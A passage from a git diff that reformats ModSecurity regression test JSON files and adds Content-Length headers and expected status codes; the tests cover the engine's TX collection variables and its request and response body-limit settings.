"gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"310\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"310\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=%{REQUEST_HEADERS:Keep-Alive}%\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", @@ -175,58 +181,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (4/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"5\" \\(Variable: TX:something_else\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"5\" \\(Variable: TX:something_else\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something_else=%{tx.something}%\"", diff --git a/test/test-cases/regression/collection-tx.json b/test/test-cases/regression/collection-tx.json index 07099405f7..587fb33053 100644 --- a/test/test-cases/regression/collection-tx.json +++ b/test/test-cases/regression/collection-tx.json @@ -1,212 +1,222 @@ [ - { + { "enabled": 1, - "version_min":300000, - "version_max":0, - "title":"Collection :: TX full vs partial match", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "version_min": 300000, + "version_max": 0, + "title": "Collection :: TX full vs partial match", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Content-Length": "0" }, - "uri":"/", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text/xml; charset=utf-8\n" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n", + "Content-Length": "39" }, - "body":[ + "body": [ "\n" ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@unconditionalMatch\" \"id:1,deny,setvar:TX.partial_match=1,chain\"", "SecRule TX.partial \"@gt 0\" \"id:2,t:lowercase,t:none,status:444\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (1/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"to_test\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"to_test\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=to_test\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (2/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"1\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"1\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (3/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"20\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"20\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", @@ -214,58 +224,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (4/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"15\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"15\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", @@ -274,59 +286,61 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie I", - "Cookie2":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie II", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie I", + "Cookie2": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie II", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"40\" \\(Variable: TX:anomaly_score\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"40\" \\(Variable: TX:anomaly_score\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,setvar:tx.critical_anomaly_score=5\"", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:2,setvar:tx.anomaly_score=10\"", diff --git a/test/test-cases/regression/config-body_limits.json b/test/test-cases/regression/config-body_limits.json index 5059f11ae6..e45dfce227 100644 --- a/test/test-cases/regression/config-body_limits.json +++ b/test/test-cases/regression/config-body_limits.json @@ -1,106 +1,117 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ +[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "http_code":403 + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction ProcessPartial", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction ProcessPartial", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyLimitAction ProcessPartial", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" - }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Content-Length": "493" + }, + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -118,47 +129,49 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":403 + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject - Engine Disabled", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" - }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject - Engine Disabled", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Content-Length": "493" + }, + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -176,47 +189,49 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine Off", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject - Engine Detection Only", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" - }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject - Engine Detection Only", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Content-Length": "493" + }, + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -234,46 +249,48 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction ProcessPartial", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - 